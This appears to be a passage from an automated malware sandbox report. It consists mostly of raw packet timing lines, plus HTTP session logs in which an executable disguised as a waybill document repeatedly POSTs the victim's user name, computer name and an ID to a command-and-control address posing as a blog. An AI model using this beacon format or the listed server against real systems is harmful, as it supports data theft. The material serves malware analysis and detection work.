                                              Apr 25, 2024 09:43:47.213737011 CEST804983245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.213800907 CEST4983280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.214083910 CEST804983245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.214133024 CEST4983280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.214246035 CEST804983245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.214299917 CEST4983280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.214337111 CEST804983245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.214387894 CEST4983280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.214494944 CEST804983245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.214539051 CEST804983245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.214551926 CEST4983280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.214576960 CEST804983245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.214591026 CEST4983280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.214626074 CEST4983280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.331370115 CEST804983245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.331412077 CEST804983245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.331444025 CEST4983280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.331454039 CEST804983245.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.331527948 CEST4983280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.331527948 CEST4983280192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.349926949 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.477118015 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.477215052 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.479485035 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.606606960 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:47.606699944 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:47.734168053 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.415240049 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.415296078 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.415328979 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.415380001 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.415380001 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.415380001 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.425446987 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.425532103 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.425626993 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.425685883 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.425743103 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.425810099 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.425856113 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.425906897 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.426044941 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.426086903 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.426095963 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.426125050 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.426137924 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.426175117 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.542650938 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.542692900 CEST804983345.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.542701006 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.542737961 CEST4983380192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.550956011 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.678390980 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.678473949 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.680283070 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.807535887 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:48.807760000 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:48.934984922 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.635854959 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.635963917 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.635982037 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.636029005 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.646401882 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.646517992 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.646917105 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.646954060 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.646975040 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.646987915 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.646996975 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.647031069 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.647141933 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.647183895 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.647192001 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.647229910 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.647372961 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.647412062 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.647418976 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.647456884 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.763006926 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.763062954 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.763206959 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.763245106 CEST804983445.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.763252020 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.763284922 CEST4983480192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.773098946 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.905040979 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:49.905183077 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:49.906919003 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.036711931 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.036832094 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.166071892 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.873189926 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.873224020 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.873291969 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.873291969 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.881438017 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.881489038 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.881711006 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.881756067 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.881839991 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.881886005 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.881925106 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.881968975 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.882101059 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.882119894 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.882142067 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.882174015 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.882246971 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.882285118 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:50.882292032 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:50.882320881 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:51.002819061 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:51.002878904 CEST804983545.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:51.003001928 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:51.003002882 CEST4983580192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:51.005300999 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:51.136118889 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:51.136257887 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:51.138011932 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:51.269076109 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:51.269185066 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:51.400070906 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.190967083 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.191026926 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.191121101 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.191184044 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.191184044 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.191184044 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.206783056 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.206958055 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.209263086 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.209316969 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.209402084 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.209450006 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.209625959 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.209671021 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.211304903 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.211345911 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.211359024 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.211383104 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.211393118 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.211429119 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.322160959 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.322225094 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.322386026 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.322484016 CEST804983645.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.322490931 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.322527885 CEST4983680192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.334510088 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.468362093 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.468575954 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.470303059 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.603225946 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:52.603302956 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:52.736426115 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.450469971 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.450628996 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.450666904 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.450695038 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.450743914 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.450743914 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.462632895 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.462670088 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.462703943 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.462779045 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.462779045 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.462779045 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.462795019 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.462832928 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.462912083 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.462949991 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.462951899 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.462987900 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.463193893 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.463234901 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.584064960 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.584130049 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.584224939 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.584266901 CEST804983745.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.584273100 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.584310055 CEST4983780192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.586256981 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.717263937 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.717386007 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.719259977 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.850147963 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:56.850287914 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:56.981453896 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.712359905 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.712426901 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.712512970 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.712560892 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.712570906 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.712610960 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.722717047 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.722830057 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.723161936 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.723196983 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.723309040 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.723309040 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.723332882 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.723387003 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.723440886 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.723496914 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.723514080 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.723608971 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.723647118 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.723700047 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.843801975 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.843878031 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.843898058 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.843919992 CEST804983845.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.843926907 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.843974113 CEST4983880192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.860383034 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.991070986 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:57.991323948 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:57.993135929 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:58.124054909 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.124128103 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:58.255629063 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.941550016 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.941605091 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.941647053 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:58.941683054 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:58.950481892 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.950530052 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:58.950798035 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.950839996 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:58.950886011 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.950930119 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:58.951003075 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.951062918 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:58.951208115 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.951328993 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:58.951365948 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.951409101 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.951447964 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:58.951450109 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:58.951488018 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:59.072662115 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:59.072721004 CEST804983945.77.223.48192.168.2.4
                                              Apr 25, 2024 09:43:59.072729111 CEST4983980192.168.2.445.77.223.48
                                              Apr 25, 2024 09:43:59.072798014 CEST4983980192.168.2.445.77.223.48
                                              • 45.77.223.48
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.44973545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:41:57.336379051 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 176
                                              Connection: close
                                              Apr 25, 2024 09:41:57.470454931 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: 'ckav.rujones123716JONES-PCk0FDD42EE188E931437F4FBE2C1v1yF
                                              Apr 25, 2024 09:41:58.420763016 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:41:57 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:41:58.420820951 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:41:58.421011925 CEST5INData Raw: 55 54 46 2d 38
                                              Data Ascii: UTF-8
                                              Apr 25, 2024 09:41:58.421130896 CEST6INData Raw: 22 20 2f 3e 0a 09
                                              Data Ascii: " />
                                              Apr 25, 2024 09:41:58.421236038 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:41:58.429910898 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:41:58.430213928 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:41:58.430226088 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:41:58.430366993 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:41:58.430546045 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.44974145.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:41:58.700834990 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 176
                                              Connection: close
                                              Apr 25, 2024 09:41:58.827822924 CEST176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: 'ckav.rujones123716JONES-PC+0FDD42EE188E931437F4FBE2Cjq9lv
                                              Apr 25, 2024 09:41:59.637592077 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:41:58 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:41:59.637612104 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:41:59.637623072 CEST11INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: UTF-8" />
                                              Apr 25, 2024 09:41:59.637634039 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:41:59.645780087 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:41:59.645935059 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:41:59.645946980 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
